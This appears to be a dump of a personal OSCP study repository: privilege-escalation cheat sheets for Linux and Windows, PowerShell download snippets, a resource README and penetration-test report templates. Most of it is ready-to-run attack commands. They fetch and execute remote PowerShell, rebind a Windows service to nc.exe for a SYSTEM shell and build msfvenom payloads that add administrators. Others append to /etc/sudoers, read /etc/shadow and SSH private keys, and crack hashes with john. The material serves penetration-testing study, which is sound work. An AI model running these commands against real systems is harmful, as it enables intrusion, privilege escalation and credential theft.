>>wget.ps1 63 | echo $file = "powerup.ps1" >>wget.ps1 64 | echo $webclient.DownloadFile($url,$file) >>wget.ps1 65 | powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1 66 | 67 | -------------------------------------- 68 | # Powershell download a file 69 | powershell "IEX(New Object Net.WebClient).downloadString('http:///file.ps1')" 70 | 71 | 72 | -------------------------------------------------------------------------------- /Priv Esc - Linux: -------------------------------------------------------------------------------- 1 | 2 | # priv esc enumeration scripts 3 | https://github.com/rebootuser/LinEnum 4 | https://github.com/reider-roque/linpostexp/blob/master/linprivchecker.py 5 | http://pentestmonkey.net/tools/audit/unix-privesc-check 6 | 7 | # Kernel and OS 8 | uname -a 9 | uname -mrs 10 | cat /etc/issue 11 | cat /etc/lsb-release # Debian based 12 | cat /etc/redhat-release # Redhat based 13 | 14 | # running services and find services run boy root 15 | ps aux 16 | ps aux | grep root 17 | 18 | # which applications are installed 19 | dpkg -l 20 | ls -alh /usr/bin/ 21 | ls -alh /sbin/ 22 | 23 | # scheduled tasks 24 | crontab -l 25 | 26 | # port forwarding 27 | ssh -L 8080:127.0.0.1:80 root@192.168.1.7 # Local Port 28 | ssh -R 8080:127.0.0.1:80 root@192.168.1.7 # Remote Port 29 | 30 | # tunneling 31 | ssh -D 127.0.0.1:9050 -N [username]@[ip] 32 | proxychains ifconfig 33 | 34 | # sensitive files 35 | cat /etc/passwd 36 | cat /etc/group 37 | cat /etc/shadow 38 | ls -alh /var/mail/ 39 | 40 | # check home dirs 41 | ls -ahlR /root/ 42 | ls -ahlR /home 43 | 44 | # private key search 45 | cat ~/.ssh/authorized_keys 46 | cat ~/.ssh/identity.pub 47 | cat ~/.ssh/identity 48 | cat ~/.ssh/id_rsa.pub 49 | cat ~/.ssh/id_rsa 50 | cat ~/.ssh/id_dsa.pub 51 | cat ~/.ssh/id_dsa 52 | cat /etc/ssh/ssh_config 53 | cat /etc/ssh/sshd_config 54 | cat /etc/ssh/ssh_host_dsa_key.pub 55 | cat /etc/ssh/ssh_host_dsa_key 56 | cat /etc/ssh/ssh_host_rsa_key.pub 57 | cat /etc/ssh/ssh_host_rsa_key 58 | cat /etc/ssh/ssh_host_key.pub 59 | cat /etc/ssh/ssh_host_key 60 | 61 | 62 | # Sticky Bits & SUID & GUID 63 | 64 | find / -perm -1000 -type d 2>/dev/null # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here. 65 | find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it. 66 | find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it. 67 | find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID 68 | 69 | 70 | 71 | 72 | 73 | -------------------------------------------------------------------------------- /Priv Esc - Windows: -------------------------------------------------------------------------------- 1 | Windows 2 | 3 | Enumeration 4 | 5 | # basics 6 | systeminfo 7 | hostname 8 | echo %username% 9 | 10 | # users 11 | net users 12 | net user 13 | 14 | # network 15 | ipconfig /all 16 | route print 17 | arp -A 18 | netstat -ano # active network connections 19 | 20 | # firewall status 21 | netsh firewall show state 22 | netsh firewall show config 23 | netsh advfirewall firewall show rule all 24 | 25 | # systeminfo output save in a file, check for vulnerabilities 26 | https://github.com/GDSSecurity/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.py 27 | python windows-exploit-suggester.py -d 2017-05-27-mssb.xls -i systeminfo.txt 28 | 29 | # Search patches for given patch 30 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.." 31 | 32 | -------------------------------------- 33 | Kernel 34 | systeminfo 35 | systeminfo | findstr /B /C:"OS Name" /C:"OS Version" 36 | 37 | # check for possible exploits, find a place to upload (eg: C:\Inetpub or C:\temp) it, run exe 38 | 39 | -------------------------------------- 40 | Weak permissions 41 | # this example is for XP SP0 42 | # upload accesschk.exe to a writable directory first 43 | # for XP version 5.2 of accesschk.exe is needed 44 | https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe 45 | 46 | # check for serices with weak permissions 47 | accesschk.exe -uwcqv "Authenticated Users" * /accepteula 48 | # check for the found services above 49 | accesschk.exe -ucqv upnphost 50 | # upload nc.exe to writable directory 51 | sc config upnphost binpath= "C:\Inetpub\nc.exe -nv 9988 -e C:\WINDOWS\System32\cmd.exe" 52 | sc config upnphost obj= ".\LocalSystem" password= "" 53 | # check the status now 54 | sc qc upnphost 55 | # change start option as AUTO-START 56 | sc config SSDPSRV start=auto 57 | #start the services 58 | net start SSDPSRV 59 | net stop upnphost 60 | net start upnphost 61 | 62 | # listen on port 9988 and you'll get a shell with NT AUTHORITY\SYSTEM privileges 63 | 64 | -------------------------------------- 65 | 66 | Registry Checks for Passwords 67 | reg query HKLM /f password /t REG_SZ /s 68 | reg query HKCU /f password /t REG_SZ /s 69 | reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 70 | reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" 71 | reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" 72 | reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password 73 | 74 | -------------------------------------- 75 | Places to Check for Credentials 76 | 77 | C:\sysprep.inf 78 | C:\sysprep\sysprep.xml 79 | %WINDIR%\Panther\Unattend\Unattended.xml 80 | %WINDIR%\Panther\Unattended.xml 81 | 82 | dir /b /s unattend.xml 83 | dir /b /s web.config 84 | dir /b /s sysprep.inf 85 | dir /b /s sysprep.xml 86 | dir /b /s *pass* 87 | dir /b /s vnc.ini 88 | 89 | ---------------------------- 90 | Groups.xml 91 | # Look up ip-addres of DC 92 | nslookup nameofserver.whatever.local 93 | 94 | # It will output something like this 95 | Address: 192.168.1.101 96 | 97 | # Now we mount it 98 | net use z: \\192.168.1.101\SYSVOL 99 | 100 | # And enter it 101 | z: 102 | 103 | # Now we search for the groups.xml file 104 | dir Groups.xml /s 105 | 106 | # decrypt the password in it 107 | gpp-decrypt 108 | 109 | ----------------------------- 110 | 111 | AlwaysInstallElevated 112 | reg query HKLM\Software\Policies\Microsoft\Windows\Installer 113 | reg query HKCU\Software\Policies\Microsoft\Windows\Installer 114 | # From the output, notice that “AlwaysInstallElevated” value is 1. 115 | 116 | # Exploitation: 117 | msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f msi-nouac -o setup.msi 118 | Place 'setup.msi' in 'C:\Temp' 119 | msiexec /quiet /qn /i C:\Temp\setup.msi 120 | net localgroup Administrators 121 | 122 | --------------------------------- 123 | Find writable files 124 | 125 | 126 | dir /a-r-d /s /b 127 | /a is to search for attributes. In this case r is read only and d is directory. (look for writable files only) 128 | /s means recurse subdirectories 129 | /b means bare format. Path and filename only. 130 | 131 | ----------------------------------- 132 | Unquoted Path 133 | wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """ 134 | # Suppose we found: C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe 135 | # check for permissions of folder path 136 | icacls "C:\Program Files (x86)\Program Folder" 137 | 138 | # exploit 139 | msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe 140 | Place common.exe in ‘C:\Program Files\Unquoted Path Service’. 141 | #Open command prompt and type: 142 | sc start unquotedsrvc 143 | net localgroup Administrators 144 | 145 | ----------------------------------- 146 | # psexec using found credentials 147 | # first upload nc.exe to a writable directory 148 | psexec.exe -u -p \\MACHINENAME C:\Inetpub\nc.exe -e C:\windows\system32\cmd.exe 149 | 150 | -------------------------------------------------------------------------------- /Readme.md: -------------------------------------------------------------------------------- 1 | # OSCP Cave of Wonders 2 | 3 | 4 | ![Cave of Wonders](http://oyster.ignimgs.com/wordpress/stg.ign.com/2018/10/082.jpg) 5 | 6 | 7 | On the my personal path to OSCP I have gathered quite a bit of important and useful information. The goal is to organize them in this Cave of Wonders to help fellow and future students of this amazing skill. 8 | 9 | 10 | 11 | ---------- 12 | 13 | Legal Notice && Usage: 14 | *The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “*[*ethical hacker*](https://www.dictionary.com/browse/ethical-hacker)*” standpoint. Only preform testing on systems you OWN and/or have expressed written permission. Use information at your own risk.* 15 | 16 | *By continuing, you acknowledge the aforementioned user risk/responsibilities.* 17 | 18 | 19 | ---------- 20 | 21 | 22 | 23 | **Path to OSCP Write-ups** 24 | 25 | https://h0mbre.github.io/OSCP/# #resources avaliable on site. 26 | 27 | https://www.reddit.com/r/hacking/comments/7nkmfc/road_to_oscp/ 28 | 29 | https://h4cklife.org/2018/05/22/a-pre-exam-for-future-oscp-students/ 30 | 31 | https://areyou1or0.blogspot.com/2019/01/finally-oscp-may-force-be-with-you.html 32 | 33 | https://www.alienvault.com/blogs/security-essentials/how-to-prepare-to-take-the-oscp 34 | 35 | https://scund00r.com/all/oscp/2018/02/25/passing-oscp.html 36 | 37 | https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-1-is-oscp-for-you-b57cbcce7440 38 | 39 | https://www.cybrary.it/0p3n/prep-guide-offsecs-pwkoscp/ 40 | 41 | (added) https://www.netsecfocus.com/oscp/2019/03/29/The_Journey_to_Try_Harder-_TJNulls_Preparation_Guide_for_PWK_OSCP.html 42 | 43 | https://scriptdotsh.com/index.php/2018/04/17/31-days-of-oscp-experience/ 44 | 45 | 46 | **OSCP Like Boxes:** 47 | 48 | 49 | ![](https://d2mxuefqeaa7sj.cloudfront.net/s_351A7D4F2DBCAF6EB8FB891FE142C0B41CFA7F706C7700B8A3D9E20EA5B637D7_1550514432475_image.png) 50 | 51 | 52 | source: https://www.abatchy.com/2017/02/oscp-like-vulnhub-vms 53 | 54 | 55 | ![](https://d2mxuefqeaa7sj.cloudfront.net/s_351A7D4F2DBCAF6EB8FB891FE142C0B41CFA7F706C7700B8A3D9E20EA5B637D7_1550513570829_image.png) 56 | 57 | 58 | source: https://twitter.com/TJ_Null/status/1088954719152865281?s=19 59 | 60 | 61 | 62 | ![](https://d2mxuefqeaa7sj.cloudfront.net/s_351A7D4F2DBCAF6EB8FB891FE142C0B41CFA7F706C7700B8A3D9E20EA5B637D7_1550514309701_image.png) 63 | 64 | 65 | source: cant remember 66 | 67 | 68 | 69 | https://www.youtube.com/playlist?list=PLK5YOQDpZKK2GtfxOHw9LQZl3z_f74EoR 70 | 71 | 72 | 73 | **OSCP Preperation Notes** 74 | 75 | 76 | ![](https://d2mxuefqeaa7sj.cloudfront.net/s_351A7D4F2DBCAF6EB8FB891FE142C0B41CFA7F706C7700B8A3D9E20EA5B637D7_1550514597005_image.png) 77 | 78 | 79 | source: https://highon.coffee/blog/cheat-sheet/ 80 | 81 | 82 | https://github.com/rewardone/OSCPRepo 83 | 84 | https://github.com/areyou1or0/OSCP 85 | 86 | ![](/static/img/pixel.gif) 87 | 88 | 89 | 90 | 91 | -------------------------------------------------------------------------------- /Reporting-Templates/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/executeatwill/OSCP-Treasure-Cave/c3e706a3527d1887b4f8462932e4372bab06d418/Reporting-Templates/.DS_Store -------------------------------------------------------------------------------- /Reporting-Templates/linux-template.md: -------------------------------------------------------------------------------- 1 | ## Info-sheet 2 | 3 | - DNS-Domain name: 4 | - Host name: 5 | - OS: 6 | - Server: 7 | - Kernel: 8 | - Workgroup: 9 | - Windows domain: 10 | 11 | Services and ports: 12 | INSERTTCPSCAN 13 | 14 | ## Recon 15 | 16 | 17 | ``` 18 | Always start with a stealthy scan to avoid closing ports. 19 | 20 | # Syn-scan 21 | nmap -sS INSERTIPADDRESS 22 | 23 | # Scan all ports, might take a while. 24 | nmap INSERTIPADDRESS -p- 25 | 26 | # Service-version, default scripts, OS: 27 | nmap INSERTIPADDRESS -sV -sC -O -p 111,222,333 28 | 29 | # Scan for UDP 30 | nmap INSERTIPADDRESS -sU 31 | unicornscan -mU -v -I INSERTIPADDRESS 32 | 33 | # Connect to udp if one is open 34 | nc -u INSERTIPADDRESS 48772 35 | 36 | # Monster scan 37 | nmap INSERTIPADDRESS -p- -A -T4 -sC 38 | ``` 39 | 40 | 41 | ### Port 21 - FTP 42 | 43 | - FTP-Name: 44 | - FTP-version: 45 | - Anonymous login: 46 | 47 | INSERTFTPTEST 48 | 49 | 50 | ``` 51 | nmap --script=ftp-anon,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 INSERTIPADDRESS 52 | ``` 53 | 54 | ### Port 22 - SSH 55 | 56 | - Name: 57 | - Version: 58 | - Takes-password: 59 | - If you have usernames test login with username:username 60 | 61 | INSERTSSHCONNECT 62 | 63 | ``` 64 | nc INSERTIPADDRESS 22 65 | ``` 66 | 67 | ### Port 25 68 | 69 | - Name: 70 | - Version: 71 | - VRFY: 72 | 73 | INSERTSMTPCONNECT 74 | 75 | 76 | ``` 77 | nc -nvv INSERTIPADDRESS 25 78 | HELO foo 79 | 80 | telnet INSERTIPADDRESS 25 81 | VRFY root 82 | 83 | nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 INSERTIPADDRESS 84 | ``` 85 | 86 | ### Port 69 - UDP - TFTP 87 | 88 | This is used for tftp-server. 89 | 90 | 91 | ### Port 110 - Pop3 92 | 93 | - Name: 94 | - Version: 95 | 96 | INSERTPOP3CONNECT 97 | 98 | ``` 99 | telnet INSERTIPADDRESS 110 100 | USER pelle@INSERTIPADDRESS 101 | PASS admin 102 | 103 | or: 104 | 105 | USER pelle 106 | PASS admin 107 | 108 | # List all emails 109 | list 110 | 111 | # Retrieve email number 5, for example 112 | retr 9 113 | ``` 114 | 115 | ### Port 111 - Rpcbind 116 | 117 | ``` 118 | rpcinfo -p INSERTIPADDRESS 119 | ``` 120 | 121 | 122 | ### Port 135 - MSRPC 123 | 124 | Some versions are vulnerable. 125 | 126 | ### Port 143 - Imap 127 | 128 | ### Port 139/445 - SMB 129 | 130 | - Name: 131 | - Version: 132 | - Domain/workgroup name: 133 | - Domain-sid: 134 | - Allows unauthenticated login: 135 | 136 | 137 | ``` 138 | nmap --script=smb-enum-shares.nse,smb-ls.nse,smb-enum-users.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-security-mode.nse,smbv2-enabled.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse,smbv2-enabled.nse INSERTIPADDRESS -p 445 139 | 140 | 141 | enum4linux -a INSERTIPADDRESS 142 | rpcclient -U "" INSERTIPADDRESS 143 | srvinfo 144 | enumdomusers 145 | getdompwinfo 146 | querydominfo 147 | netshareenum 148 | netshareenumall 149 | 150 | smbclient -L INSERTIPADDRESS 151 | smbclient //INSERTIPADDRESS/tmp 152 | smbclient \\\\INSERTIPADDRESS\\ipc$ -U john 153 | smbclient //INSERTIPADDRESS/ipc$ -U john 154 | ``` 155 | 156 | 157 | ### Port 161/162 UDP - SNMP 158 | 159 | ``` 160 | nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes INSERTIPADDRESS 161 | snmp-check -t INSERTIPADDRESS -c public 162 | ``` 163 | 164 | ``` 165 | # Common community strings 166 | public 167 | private 168 | community 169 | ``` 170 | 171 | 172 | ### Port 554 - RTSP 173 | 174 | 175 | ### Port 1030/1032/1033/1038 176 | 177 | Used by RPC to connect in domain network. 178 | 179 | ## Port 1521 - Oracle 180 | 181 | - Name: 182 | - Version: 183 | - Password protected: 184 | 185 | ``` 186 | tnscmd10g version -h INSERTIPADDRESS 187 | tnscmd10g status -h INSERTIPADDRESS 188 | ``` 189 | 190 | ### Port 2049 - NFS 191 | 192 | ``` 193 | showmount -e INSERTIPADDRESS 194 | 195 | If you find anything you can mount it like this: 196 | 197 | mount INSERTIPADDRESS:/ /tmp/NFS 198 | mount -t INSERTIPADDRESS:/ /tmp/NFS 199 | ``` 200 | 201 | ### Port 2100 - Oracle XML DB 202 | 203 | - Name: 204 | - Version: 205 | - Default logins: 206 | 207 | ``` 208 | sys:sys 209 | scott:tiger 210 | ``` 211 | 212 | Default passwords 213 | https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm 214 | 215 | 216 | ### 3306 - MySQL 217 | 218 | - Name: 219 | - Version: 220 | 221 | ``` 222 | nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse INSERTIPADDRESS -p 3306 223 | 224 | mysql --host=INSERTIPADDRESS -u root -p 225 | ``` 226 | 227 | ### Port 3339 - Oracle web interface 228 | 229 | 230 | - Basic info about web service (apache, nginx, IIS) 231 | - Server: 232 | - Scripting language: 233 | - Apache Modules: 234 | - IP-address: 235 | 236 | ### Port 80 - Web server 237 | 238 | - Server: 239 | - Scripting language: 240 | - Apache Modules: 241 | - IP-address: 242 | - Domain-name address: 243 | 244 | 245 | INSERTCURLHEADER 246 | 247 | - Web application (ex, wordpress, joomla, phpmyadmin) 248 | - Name: 249 | - Version: 250 | - Admin-login: 251 | 252 | 253 | ``` 254 | # Nikto 255 | nikto -h http://INSERTIPADDRESS 256 | 257 | # Nikto with squid proxy 258 | nikto -h INSERTIPADDRESS -useproxy http://INSERTIPADDRESS:4444 259 | 260 | # CMS Explorer 261 | cms-explorer -url http://INSERTIPADDRESS -type [Drupal, WordPress, Joomla, Mambo] 262 | 263 | # WPScan (vp = Vulnerable Plugins, vt = Vulnerable Themes, u = Users) 264 | wpscan --url http://INSERTIPADDRESS 265 | wpscan --url http://INSERTIPADDRESS --enumerate vp 266 | wpscan --url http://INSERTIPADDRESS --enumerate vt 267 | wpscan --url http://INSERTIPADDRESS --enumerate u 268 | 269 | # Joomscan 270 | joomscan -u http://INSERTIPADDRESS 271 | joomscan -u http://INSERTIPADDRESS --enumerate-components 272 | 273 | # Get header 274 | curl -i INSERTIPADDRESS 275 | 276 | # Get everything 277 | curl -i -L INSERTIPADDRESS 278 | 279 | # Check for title and all links 280 | curl INSERTIPADDRESS -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//' 281 | 282 | # Look at page with just text 283 | curl INSERTIPADDRESS -s -L | html2text -width '99' | uniq 284 | 285 | # Check if it is possible to upload 286 | curl -v -X OPTIONS http://INSERTIPADDRESS/ 287 | curl -v -X PUT -d '' http://INSERTIPADDRESS/test/shell.php 288 | 289 | dotdotpwn.pl -m http -h INSERTIPADDRESS -M GET -o unix 290 | ``` 291 | 292 | #### Nikto scan 293 | 294 | 295 | INSERTNIKTOSCAN 296 | 297 | 298 | #### Url brute force 299 | 300 | ``` 301 | # Not recursive 302 | dirb http://INSERTIPADDRESS -r -o dirb-INSERTIPADDRESS.txt 303 | 304 | # Gobuster - remove relevant responde codes (403 for example) 305 | gobuster -u http://INSERTIPADDRESS -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e 306 | ``` 307 | 308 | INSERTDIRBSCAN 309 | 310 | 311 | #### Default/Weak login 312 | 313 | Search documentation for default passwords and test them 314 | 315 | ``` 316 | site:webapplication.com password 317 | ``` 318 | 319 | ``` 320 | admin admin 321 | admin password 322 | admin 323 | admin 324 | root root 325 | root admin 326 | root password 327 | root 328 | password 329 | admin 330 | username 331 | username 332 | ``` 333 | 334 | 335 | #### LFI/RFI 336 | 337 | 338 | 339 | 340 | ``` 341 | fimap -u "http://INSERTIPADDRESS/example.php?test=" 342 | 343 | # Ordered output 344 | curl -s http://INSERTIPADDRESS/gallery.php?page=/etc/passwd 345 | /root/Tools/Kadimus/kadimus -u http://INSERTIPADDRESS/example.php?page= 346 | ``` 347 | 348 | #### SQL-Injection 349 | 350 | ``` 351 | # Post 352 | ./sqlmap.py -r search-test.txt -p tfUPass 353 | 354 | # Get 355 | sqlmap -u "http://INSERTIPADDRESS/index.php?id=1" --dbms=mysql 356 | 357 | # Crawl 358 | sqlmap -u http://INSERTIPADDRESS --dbms=mysql --crawl=3 359 | ``` 360 | 361 | #### Sql-login-bypass 362 | 363 | - Open Burp-suite 364 | - Make and intercept a request 365 | - Send to intruder 366 | - Cluster attack. 367 | - Paste in sqlibypass-list (https://bobloblaw.gitbooks.io/security/content/sql-injections.html) 368 | - Attack 369 | - Check for response length variation 370 | 371 | 372 | ### Password brute force - last resort 373 | 374 | ``` 375 | cewl 376 | ``` 377 | 378 | ### Port 443 - HTTPS 379 | 380 | Heartbleed: 381 | 382 | ``` 383 | # Heartbleed 384 | sslscan INSERTIPADDRESS:443 385 | ``` 386 | 387 | ## Vulnerability analysis 388 | 389 | Now we have gathered information about the system. Now comes the part where we look for exploits and vulnerabilites and features. 390 | 391 | ### To try - List of possibilies 392 | Add possible exploits here: 393 | 394 | 395 | 396 | ### Find sploits - Searchsploit and google 397 | 398 | Where there are many exploits for a software, use google. It will automatically sort it by popularity. 399 | 400 | ``` 401 | site:exploit-db.com apache 2.4.7 402 | 403 | # Remove dos-exploits 404 | 405 | searchsploit Apache 2.4.7 | grep -v '/dos/' 406 | searchsploit Apache | grep -v '/dos/' | grep -vi "tomcat" 407 | 408 | # Only search the title (exclude the path), add the -t 409 | searchsploit -t Apache | grep -v '/dos/' 410 | ``` 411 | 412 | 413 | 414 | ---------------------------------------------------------------------------- 415 | 416 | 417 | 418 | '''''''''''''''''''''''''''''''''' PRIVESC ''''''''''''''''''''''''''''''''' 419 | 420 | 421 | 422 | ----------------------------------------------------------------------------- 423 | 424 | 425 | 426 | ## Privilege escalation 427 | 428 | Now we start the whole enumeration-process over gain. 429 | 430 | - Kernel exploits 431 | - Programs running as root 432 | - Installed software 433 | - Weak/reused/plaintext passwords 434 | - Inside service 435 | - Suid misconfiguration 436 | - World writable scripts invoked by root 437 | - Unmounted filesystems 438 | 439 | Less likely 440 | 441 | - Private ssh keys 442 | - Bad path configuration 443 | - Cronjobs 444 | 445 | 446 | ### To-try list 447 | 448 | Here you will add all possible leads. What to try. 449 | 450 | 451 | ### Useful commands 452 | 453 | ``` 454 | # Spawning shell 455 | python -c 'import pty; pty.spawn("/bin/sh")' 456 | 457 | # Access to more binaries 458 | export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin 459 | 460 | # Set up webserver 461 | cd /root/oscp/useful-tools/privesc/linux/privesc-scripts; python -m SimpleHTTPServer 8080 462 | 463 | # Download all files 464 | wget http://192.168.1.101:8080/ -r; mv 192.168.1.101:8080 exploits; cd exploits; rm index.html; chmod 700 LinEnum.sh linprivchecker.py unix-privesc-check 465 | 466 | ./LinEnum.sh -t -k password -r LinEnum.txt 467 | python linprivchecker.py extended 468 | ./unix-privesc-check standard 469 | 470 | 471 | # Writable directories 472 | /tmp 473 | /var/tmp 474 | 475 | 476 | # Add user to sudoers 477 | echo "hacker ALL=(ALL:ALL) ALL" >> /etc/sudoers 478 | ``` 479 | 480 | 481 | ### Basic info 482 | 483 | - OS: 484 | - Version: 485 | - Kernel version: 486 | - Architecture: 487 | - Current user: 488 | 489 | **Devtools:** 490 | - GCC: 491 | - NC: 492 | - WGET: 493 | 494 | **Users with login:** 495 | 496 | ``` 497 | uname -a 498 | env 499 | id 500 | cat /proc/version 501 | cat /etc/issue 502 | cat /etc/passwd 503 | cat /etc/group 504 | cat /etc/shadow 505 | cat /etc/hosts 506 | 507 | # Users with login 508 | grep -vE "nologin" /etc/passwd 509 | 510 | # Priv Enumeration Scripts 511 | 512 | 513 | upload /unix-privesc-check 514 | upload /root/Desktop/Backup/Tools/Linux_privesc_tools/linuxprivchecker.py ./ 515 | upload /root/Desktop/Backup/Tools/Linux_privesc_tools/LinEnum.sh ./ 516 | 517 | python linprivchecker.py extended 518 | ./LinEnum.sh -t -k password 519 | unix-privesc-check 520 | ``` 521 | 522 | ### Kernel exploits 523 | 524 | ``` 525 | site:exploit-db.com kernel version 526 | 527 | perl /root/oscp/useful-tools/privesc/linux/Linux_Exploit_Suggester/Linux_Exploit_Suggester.pl -k 2.6 528 | 529 | python linprivchecker.py extended 530 | ``` 531 | 532 | ### Programs running as root 533 | 534 | Look for webserver, mysql or anything else like that. 535 | 536 | ``` 537 | # Metasploit 538 | ps 539 | 540 | # Linux 541 | ps aux 542 | ``` 543 | 544 | ### Installed software 545 | 546 | ``` 547 | /usr/local/ 548 | /usr/local/src 549 | /usr/local/bin 550 | /opt/ 551 | /home 552 | /var/ 553 | /usr/src/ 554 | 555 | # Debian 556 | dpkg -l 557 | 558 | # CentOS, OpenSuse, Fedora, RHEL 559 | rpm -qa (CentOS / openSUSE ) 560 | 561 | # OpenBSD, FreeBSD 562 | pkg_info 563 | ``` 564 | 565 | 566 | ### Weak/reused/plaintext passwords 567 | 568 | - Check database config-file 569 | - Check databases 570 | - Check weak passwords 571 | 572 | ``` 573 | username:username 574 | username:username1 575 | username:root 576 | username:admin 577 | username:qwerty 578 | username:password 579 | ``` 580 | 581 | - Check plaintext 582 | 583 | ``` 584 | ./LinEnum.sh -t -k password 585 | ``` 586 | 587 | ### Inside service 588 | 589 | ``` 590 | # Linux 591 | netstat -anlp 592 | netstat -ano 593 | ``` 594 | 595 | ### Suid misconfiguration 596 | 597 | Binary with suid permission can be run by anyone, but when they are run they are run as root! 598 | 599 | Example programs: 600 | 601 | ``` 602 | nmap 603 | vim 604 | nano 605 | ``` 606 | 607 | ``` 608 | find / -perm -u=s -type f 2>/dev/null 609 | ``` 610 | 611 | 612 | ### Unmounted filesystems 613 | 614 | Here we are looking for any unmounted filesystems. If we find one we mount it and start the priv-esc process over again. 615 | 616 | ``` 617 | mount -l 618 | ``` 619 | 620 | ### Cronjob 621 | 622 | Look for anything that is owned by privileged user but writable for you 623 | 624 | ``` 625 | crontab -l 626 | ls -alh /var/spool/cron 627 | ls -al /etc/ | grep cron 628 | ls -al /etc/cron* 629 | cat /etc/cron* 630 | cat /etc/at.allow 631 | cat /etc/at.deny 632 | cat /etc/cron.allow 633 | cat /etc/cron.deny 634 | cat /etc/crontab 635 | cat /etc/anacrontab 636 | cat /var/spool/cron/crontabs/root 637 | ``` 638 | 639 | ### SSH Keys 640 | 641 | Check all home directories 642 | 643 | ``` 644 | cat ~/.ssh/authorized_keys 645 | cat ~/.ssh/identity.pub 646 | cat ~/.ssh/identity 647 | cat ~/.ssh/id_rsa.pub 648 | cat ~/.ssh/id_rsa 649 | cat ~/.ssh/id_dsa.pub 650 | cat ~/.ssh/id_dsa 651 | cat /etc/ssh/ssh_config 652 | cat /etc/ssh/sshd_config 653 | cat /etc/ssh/ssh_host_dsa_key.pub 654 | cat /etc/ssh/ssh_host_dsa_key 655 | cat /etc/ssh/ssh_host_rsa_key.pub 656 | cat /etc/ssh/ssh_host_rsa_key 657 | cat /etc/ssh/ssh_host_key.pub 658 | cat /etc/ssh/ssh_host_key 659 | ``` 660 | 661 | 662 | ### Bad path configuration 663 | 664 | Require user interaction 665 | 666 | 667 | 668 | 669 | 670 | ------------------------------------------------------------------------ 671 | 672 | 673 | 674 | 675 | ----------------------------- LOOT LOOT LOOT LOOT ---------------------- 676 | 677 | 678 | 679 | 680 | ------------------------------------------------------------------------ 681 | 682 | 683 | ## Loot 684 | 685 | **Checklist** 686 | 687 | - Proof: 688 | - Network secret: 689 | - Passwords and hashes: 690 | - Dualhomed: 691 | - Tcpdump: 692 | - Interesting files: 693 | - Databases: 694 | - SSH-keys: 695 | - Browser: 696 | - Mail: 697 | 698 | 699 | ### Proof 700 | 701 | ``` 702 | /root/proof.txt 703 | ``` 704 | 705 | ### Network secret 706 | 707 | ``` 708 | /root/network-secret.txt 709 | ``` 710 | 711 | ### Passwords and hashes 712 | 713 | ``` 714 | cat /etc/passwd 715 | cat /etc/shadow 716 | 717 | unshadow passwd shadow > unshadowed.txt 718 | john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt 719 | ``` 720 | 721 | ### Dualhomed 722 | 723 | ``` 724 | ifconfig 725 | ifconfig -a 726 | arp -a 727 | ``` 728 | 729 | ### Tcpdump 730 | 731 | ``` 732 | tcpdump -i any -s0 -w capture.pcap 733 | tcpdump -i eth0 -w capture -n -U -s 0 src not 192.168.1.X and dst not 192.168.1.X 734 | tcpdump -vv -i eth0 src not 192.168.1.X and dst not 192.168.1.X 735 | ``` 736 | 737 | ### Interesting files 738 | 739 | ``` 740 | #Meterpreter 741 | search -f *.txt 742 | search -f *.zip 743 | search -f *.doc 744 | search -f *.xls 745 | search -f config* 746 | search -f *.rar 747 | search -f *.docx 748 | search -f *.sql 749 | 750 | .ssh: 751 | .bash_history 752 | ``` 753 | 754 | ### Databases 755 | 756 | ### SSH-Keys 757 | 758 | ### Browser 759 | 760 | ### Mail 761 | 762 | ``` 763 | /var/mail 764 | /var/spool/mail 765 | ``` 766 | 767 | ### GUI 768 | If there is a gui we want to check out the browser. 769 | 770 | ``` 771 | echo $DESKTOP_SESSION 772 | echo $XDG_CURRENT_DESKTOP 773 | echo $GDMSESSION 774 | ``` 775 | 776 | ## How to replicate: 777 | -------------------------------------------------------------------------------- /Reporting-Templates/windows-template.md: -------------------------------------------------------------------------------- 1 | ## Info-sheet 2 | 3 | 4 | - DNS-Domain name: 5 | - Host name: 6 | - OS: 7 | - Server: 8 | - Workgroup: 9 | - Windows domain: 10 | - Services and ports: 11 | 12 | INSERTTCPSCAN 13 | 14 | 15 | ## Recon 